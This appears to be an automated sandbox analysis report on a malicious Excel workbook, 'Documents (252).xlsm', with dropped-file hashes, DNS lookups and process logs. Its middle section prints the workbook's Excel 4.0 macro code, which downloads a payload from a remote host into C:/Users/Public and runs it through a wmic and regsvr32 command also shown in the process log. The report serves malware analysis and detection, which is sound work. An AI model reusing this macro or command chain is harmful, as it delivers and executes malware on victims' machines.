                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: L..................F........N....-......+......+...0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.I....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..R.I.....S....................[.i.h.a.r.d.z.....~.1......R.I..Desktop.h.......Ny..R.I.....Y..............>......;l.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......980108...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Documents (252).xlsm.LNK
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:43 2020, mtime=Wed Apr 7 08:15:09 2021, atime=Wed Apr 7 08:15:09 2021, length=277679, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4340
                                                                                                                                                  Entropy (8bit):4.751501502393159
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:8kn74oxXHkB6pkn74oxXHkB6pXn74oxXHkB6pXn74oxXHkB6:8k7b3kKk7b3kK37b3kK37b3k
                                                                                                                                                  MD5:45C1EF5A74928CCC6915D627FC86A023
                                                                                                                                                  SHA1:ED7A22CEB778A70680BA3D7BE750CA0D8510340B
                                                                                                                                                  SHA-256:7097F37386BBDDB323256B0A956516B158499DF099D2E160EFCF45B2A16F9D5C
                                                                                                                                                  SHA-512:5D5F9AA38024C247F8991ECD492C5D1E51B85E1399DC5F2088D7B6E143F92E1F3E12D95AB61B9843B311817940B7E84E32B57E66B14A189AE21ACA565D237960
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview: L..................F.... ...U...:.......+......+...<...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.I....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..R.I.....S....................[.i.h.a.r.d.z.....~.1.....>Qxx..Desktop.h.......Ny..R.I.....Y..............>......-Q.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2..5...R.I .DOCUME~1.XLS..Z......>Qvx.R.I....h......................F..D.o.c.u.m.e.n.t.s. .(.2.5.2.)...x.l.s.m.......Z...............-.......Y...........>.S......C:\Users\user\Desktop\Documents (252).xlsm..+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.o.c.u.m.e.n.t.s. .(.2.5.2.)...x.l.s.m.........:..,.LB.)...As...`.......X.......980108...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):243
                                                                                                                                                  Entropy (8bit):4.67797989421538
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:dj/HXPWEQSGXPWEdHXPWEQSGXPWEdHXPWEQSGXPWEdHXPWEc:dTHZfGZdHZfGZdHZfGZdHZc
                                                                                                                                                  MD5:D278AEF83499DC4E2D53C88DE6CB4283
                                                                                                                                                  SHA1:54A4A6A577D6B5D06B2911D92C4045AA98C0972B
                                                                                                                                                  SHA-256:50A0B13E409E7BA0B55879078E3C1A34A5F509F6DAF4EC7D5A8AB054DAC08440
                                                                                                                                                  SHA-512:37EAFE9906D739177EE86ADF69C63E478D27E4C29F2F547764B4AEA19F4792E6002610200C0204544C6865B64E80A45677B4148D0E64EB5B0685A24990CEAD31
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: Desktop.LNK=0..[misc]..Documents (252).xlsm.LNK=0..Documents (252).xlsm.LNK=0..[misc]..Documents (252).xlsm.LNK=0..Documents (252).xlsm.LNK=0..[misc]..Documents (252).xlsm.LNK=0..Documents (252).xlsm.LNK=0..[misc]..Documents (252).xlsm.LNK=0..
                                                                                                                                                  C:\Users\user\Desktop\57810000
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):277679
                                                                                                                                                  Entropy (8bit):7.553526172386211
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:LOOQStlBQdeequOVllS/2HMBh3DdCG/gsux9R+XkXwGHZEYJtttgBAcBoCwsYijn:LZllSdosux9RbXwGXJtttYlBJDy2sS
                                                                                                                                                  MD5:AD8790A31A98D48645566DBA29BC9371
                                                                                                                                                  SHA1:EB5A23745B961BB360C1773D33FB40D96CF3AF79
                                                                                                                                                  SHA-256:FDD3B70E991EDB4999AD263C8A83ECAB00072DD5128F011848B2C9687FAAD715
                                                                                                                                                  SHA-512:E710D48835E154D4D38C4CE11D16A54D0160DA4406DE7C807C0E89AB4676AF3A423FAA0AB41F6CBDCADF647E80328D2584FFE8BC8D250296B25C21BB561D1ED5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .T.n.0....?..........C....I?`M.%.|..$..w);n..V.....;3;...f.l...L.jf.B..6.k.....QQ......."......6"U...}...zt@M..9...A.....j......T.g....C,..q.O6W..^.)Y./.o.}.....5.2...^.!..je...C7.....1;..d.1=`.\..y.3....qEsY?....4.{....J..D.d.N0..i..y?....X.C.w..-...%..2.us.....B...5.T.....9..*<.4..RI...)...GhJASY.......DG.k.rx........B.[...O.T...c.!.~..@....7.....H.......:....>.H<..Nw...Kv...S6x..c.t`.i....2N5.#.r..........PK..........!..j0.............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................M
                                                                                                                                                  C:\Users\user\Desktop\~$Documents (252).xlsm
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):495
                                                                                                                                                  Entropy (8bit):1.6081032063576088
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:RFXI6dtBhFXI6dtBhFXI6dtt:RJZhJZhJ1
                                                                                                                                                  MD5:28C0C942161F749E335A76E714AACA29
                                                                                                                                                  SHA1:53D07F227E4A2F3AF5373958409A19DE1FA1CF9C
                                                                                                                                                  SHA-256:BA0AB47EA8285A45E0884C5916C7C3052BE3C5245A0FC350DF4E83B91BC2A3F5
                                                                                                                                                  SHA-512:075F04CF77A30D166E9C04A6376629508A854F9218CEA194EC1D69A65669C51F3A0858697F258AF0DF5954DE02C7EEF2D060B6F69D8194D4D4A95D2C94900DAE
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  \Device\ConDrv
                                                                                                                                                  Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):160
                                                                                                                                                  Entropy (8bit):5.095703110114614
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgnRdde6JQAiveyzr:Yw7gJGWMXJXKSOdYiygKkXe/egXeAiv/
                                                                                                                                                  MD5:D54D3102F05E6BD2D7AF447501A743FF
                                                                                                                                                  SHA1:51BE8488225FE61E01A9AB4112CDB1231C80593B
                                                                                                                                                  SHA-256:CE9FED99E091E42C390FFBFF36D90A4DEC53BC3DDBAC6494ECCE9894618191B9
                                                                                                                                                  SHA-512:3770AB86E5F7C4784360F59F157AF850F1C84C86DF9EB129FA9E2F61145128404858A16D1F977DD6EB925246367E69232A87DBC87F386D81CC48E2AB77319B34
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 5488;...ReturnValue = 0;..};....

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:Zip archive data, at least v2.0 to extract
                                                                                                                                                  Entropy (8bit):7.557820060670911
                                                                                                                                                  TrID:
                                                                                                                                                  • Excel Microsoft Office Open XML Format document (40004/1) 83.32%
                                                                                                                                                  • ZIP compressed archive (8000/1) 16.66%
                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                                                                  File name:Documents (252).xlsm
                                                                                                                                                  File size:210308
                                                                                                                                                  MD5:966c13f10fa0b3bfe75da87bca817396
                                                                                                                                                  SHA1:1769db2ec1d019b526e63637a413ceab10d00ff3
                                                                                                                                                  SHA256:963963dd218deb7e041b5a2ccf85a48c12d62bd2bdc248d6636b332f234cba14
                                                                                                                                                  SHA512:e81cd50ab4b16286c51d62baba42170d4403947748d7d3ff4983588f9647b8912aa712fad263e9fd0119be04694d0d4ed8ad68f6d0b9d7b7ce06277e752e46e7
                                                                                                                                                  SSDEEP:1536:0jo+iv69kyln4llllllPtEEEEEEGl464S4A4jJ1rwsYijyKU2p9hYgryA:sLiC97l8Xf1LrDy2iE
                                                                                                                                                  File Content Preview:PK........E.yR................docProps/PK..........!..X..............docProps/app.xml.SAn.1..#q....'%.P.q.Z..@DJ..k.I,<.e.........,...0..?...$..W......l..ee..B...d8.I.V:... w....$.IX%..P..Dr._.`..<..!f(acA.).1.Q...q.c....J$,........|..&z........u...d.8...

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:74ecd0e2f696908c

                                                                                                                                                  Static OLE Info

                                                                                                                                                  General

                                                                                                                                                  Document Type:OpenXML
                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                  OLE File "Documents (252).xlsm"

                                                                                                                                                  Indicators

                                                                                                                                                  Has Summary Info:
                                                                                                                                                  Application Name:
                                                                                                                                                  Encrypted Document:
                                                                                                                                                  Contains Word Document Stream:
                                                                                                                                                  Contains Workbook/Book Stream:
                                                                                                                                                  Contains PowerPoint Document Stream:
                                                                                                                                                  Contains Visio Document Stream:
                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                  Flash Objects Count:
                                                                                                                                                  Contains VBA Macros:

                                                                                                                                                  Macro 4.0 Code

                                                                                                                                                  ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AC19(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AA19(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(AC20,AD20,""JCJ"",AE19,0)",,"=FORMULA.ARRAY(before.1.0.0.sheet!AK20&before.1.0.0.sheet!AK21&before.1.0.0.sheet!AK22&before.1.0.0.sheet!AK23&before.1.0.0.sheet!AK24&before.1.0.0.sheet!AK25&before.1.0.0.sheet!AK26&before.1.0.0.sheet!AK27,AC20)","=FORMULA.ARRAY(before.1.0.0.sheet!AL20&before.1.0.0.sheet!AL21&before.1.0.0.sheet!AL22&before.1.0.0.sheet!AL23&before.1.0.0.sheet!AL24&before.1.0.0.sheet!AL25&before.1.0.0.sheet!AL26&before.1.0.0.sheet!AL27&before.1.0.0.sheet!AL28&before.1.0.0.sheet!AL29&before.1.0.0.sheet!AL30&before.1.0.0.sheet!AL31&before.1.0.0.sheet!AL32&before.1.0.0.sheet!AL33&before.1.0.0.sheet!AL34&before.1.0.0.sheet!AL35,AD20)",C:/Users/Public,/dbhfr.xref,"=FORMULA.ARRAY(""A"",before.1.0.0.sheet!AE20)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""UR""&before.1.0.0.sheet!AN21,before.1.0.0.sheet!AO20&before.1.0.0.sheet!AO21&before.1.0.0.sheet!AO22&before.1.0.0.sheet!AO23&before.1.0.0.sheet!AO24&before.1.0.0.sheet!AO25&before.1.0.0.sheet!AO26&before.1.0.0.sheet!AO27&before.1.0.0.sheet!AO28&before.1.0.0.sheet!AO29&before.1.0.0.sheet!AO30&before.1.0.0.sheet!AO31&before.1.0.0.sheet!AO32&before.1.0.0.sheet!AO33&before.1.0.0.sheet!AO34&before.1.0.0.sheet!AO35&before.1.0.0.sheet!AO36&before.1.0.0.sheet!AE20,AI27,0,A99,before.1.0.0.sheet!AE19&before.1.0.0.sheet!AF19,0,0)",,Kernel32,CreateDirectoryA,A,,,,,,K,C,,,U,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AF28(),,=AD19(),=AG19(),,,=AA17(),,,,e,r,,LMon,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,e,,,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,a,,,D,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,e,t,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,e,,,w,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,3,D,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,JJCCBB,,2,i,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(""wmic.exe ""&"" process call create 'regsvr32 -s ""&AE19&AF19&""'"")",,,,,,r,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,e,,,a,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,c,,,d,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,t,,,T,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,,,F,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,y,,,i,,,,,,,,,,,,,,,,,,,,,,,

                                                                                                                                                  Network Behavior

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Apr 7, 2021 02:14:54.822761059 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:14:54.836316109 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:14:55.788259029 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:14:55.801014900 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:05.334461927 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:05.351008892 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:06.919131994 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:06.970834017 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:07.268354893 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:07.300432920 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:07.867729902 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:07.883011103 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:08.279006958 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:08.294044018 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:09.287517071 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:09.318588018 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:09.878669024 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:09.900266886 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:10.039572001 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:10.054943085 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:11.056658030 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:11.072546005 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:11.305095911 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:11.318502903 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:11.822489977 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:11.836613894 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:12.538116932 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:12.550699949 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:13.315592051 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:13.328358889 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:14.567866087 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:14.580437899 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:15.303731918 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:15.318265915 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:16.320115089 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:16.332264900 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:18.314070940 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:18.326477051 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:19.351952076 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:19.365503073 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:20.328499079 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:20.341801882 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:22.822797060 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:22.838080883 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:23.693190098 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:23.705244064 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:24.502034903 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:24.516278028 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:24.548897028 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:24.561378002 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:27.916296959 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:27.936306000 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:32.802227974 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:32.827828884 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:59.458954096 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:59.471766949 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:16:02.065057993 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:16:02.085725069 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:16:33.418023109 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:16:33.434314966 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:16:40.256187916 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:16:40.284255981 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:16:40.944395065 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:16:40.962261915 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:17:15.378403902 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:17:15.390913963 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:17:15.587543964 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:17:15.613966942 CEST53612928.8.8.8192.168.2.3

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                  Apr 7, 2021 02:15:09.878669024 CEST192.168.2.38.8.8.80x9b18Standard query (0)xherzog24pv.xyzA (IP address)IN (0x0001)

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                  Apr 7, 2021 02:15:09.900266886 CEST8.8.8.8192.168.2.30x9b18Name error (3)xherzog24pv.xyznonenoneA (IP address)IN (0x0001)

                                                                                                                                                  Code Manipulations

                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Start time:02:15:05
                                                                                                                                                  Start date:07/04/2021
                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                  Imagebase:0x12a0000
                                                                                                                                                  File size:27110184 bytes
                                                                                                                                                  MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:02:15:09
                                                                                                                                                  Start date:07/04/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:wmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref'
                                                                                                                                                  Imagebase:0x300000
                                                                                                                                                  File size:391680 bytes
                                                                                                                                                  MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:moderate

                                                                                                                                                  General

                                                                                                                                                  Start time:02:15:10
                                                                                                                                                  Start date:07/04/2021
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff6b2800000
                                                                                                                                                  File size:625664 bytes
                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:02:15:10
                                                                                                                                                  Start date:07/04/2021
                                                                                                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:regsvr32 -s C:/Users/Public/dbhfr.xref
                                                                                                                                                  Imagebase:0x7ff79bfa0000
                                                                                                                                                  File size:24064 bytes
                                                                                                                                                  MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Disassembly

                                                                                                                                                  Code Analysis

                                                                                                                                                  Reset < >